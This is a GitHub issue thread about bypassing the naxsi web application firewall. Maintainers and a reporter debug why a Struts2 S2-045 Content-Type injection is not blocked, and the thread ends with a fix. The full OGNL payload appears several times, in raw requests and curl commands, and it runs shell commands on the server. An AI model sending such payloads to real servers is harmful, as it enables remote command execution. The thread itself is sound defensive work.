### ISSUE TITLE
conten-type attack

### ISSUE THREAD

**Issue by limithit** [nbs-system/naxsi#429]
```
Content-Type:"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
```

```
MainRule "rx:multipart/form-data" "mz:$HEADERS_VAR:content-type" "s:DROP";
```

The attack of [struts2-045 046]( https://community.softwaregrp.com/t5/Security-Research/Detecting-Struts2-045-and-046-using-DAST-techniques/ba-p/222105 ) has been matched to the rule, but it has not been intercepted.

```
2018/07/03 11:57:30 [error] 11766#0: *38 NAXSI_FMT: ip=127.0.0.1&server=localhost&uri=/&learning=0&vers=0.56&total_processed=3&total_blocked=3&block=1&zone0=HEADERS&id0=0&var_name0=content-type, client: 127.0.0.1, server:localhost, request: "GET / HTTP/1.1", host: "localhost"
```

```
Content-Type:"{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
```

Removing '%' is intercepted

**Comment by buixor** [comment]
Hello @limithit 
Can you provide a reproducible test ? I'm not sure to get your point :)

Thanks !

**Comment by limithit** [comment]
Of course, this problem can be reproduced, and I tested a lot and it was the same result.

`GET http://localhost/ HTTP/1.1
User-Agent: Fiddler
Host: localhost
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -tupln').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

`

**Comment by limithit** [comment]
This is my present temporary scheme
@buixor 
 if ($content_type ~* "multipart/form-data"){
                         return 403;
                        }

**Comment by limithit** [comment]
This seems to be the result of content-type overflow @buixor

**Comment by buixor** [comment]
@limithit sorry was busy on other stuff, I'll try to take a look at it this week :)

**Comment by buixor** [comment]
Hello again @limithit !

After some testing, I was not able to reproduce (or I misunderstood something).
```
 location / {
  BasicRule id:4242 "rx:multipart/form-data" "mz:$HEADERS_VAR:content-type" "s:DROP";
  LearningMode;
  SecRulesEnabled;
```

Request :

`curl -H "Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -tupln').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" localhost:4242`

The request is correctly dropped by the rule :
```
2018/07/24 13:56:29 [error] 9108#0: *1 NAXSI_FMT: ip=127.0.0.1&server=localhost&uri=/&learning=1&vers=0.56&total_processed=1&total_blocked=1&block=1&zone0=HEADERS&id0=4242&var_name0=content-type, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", host: "localhost:4242"
```

However, beware, as `content-type` only makes sense for POST requests (that have a body).
If  you do the same request, without the custom rule, and issuing a `POST` method, you will get this :

`curl -XPOST -vvv -d @/tmp/xxx -H "Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -tupln').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" localhost:4242`

```

2018/07/24 14:02:44 [error] 9319#0: *9 NAXSI_FMT: ip=127.0.0.1&server=localhost&uri=/&learning=1&vers=0.56&total_processed=9&total_blocked=5&block=1&zone0=BODY&id0=11&var_name0=, client: 127.0.0.1, server: localhost, request: "POST / HTTP/1.1", host: "localhost:4242"

```

The ID 11, triggered here is the uncommon content-type : https://github.com/nbs-system/naxsi/wiki/internal-rules#uncommon_content_type

Can you either confirm or provide some further info ?

cheers,

**Comment by limithit** [comment]
When I tested it, the log indeed recorded the deleted request, but I can actually execute the webshell. 
maybe you have to reproduce the vulnerability environment to understand, so let's just give up.@buixor

**Comment by limithit** [comment]
I have repaired this bug and submitted the merge request. @buixor

**Comment by jvoisin** [comment]
The PR in question being #434
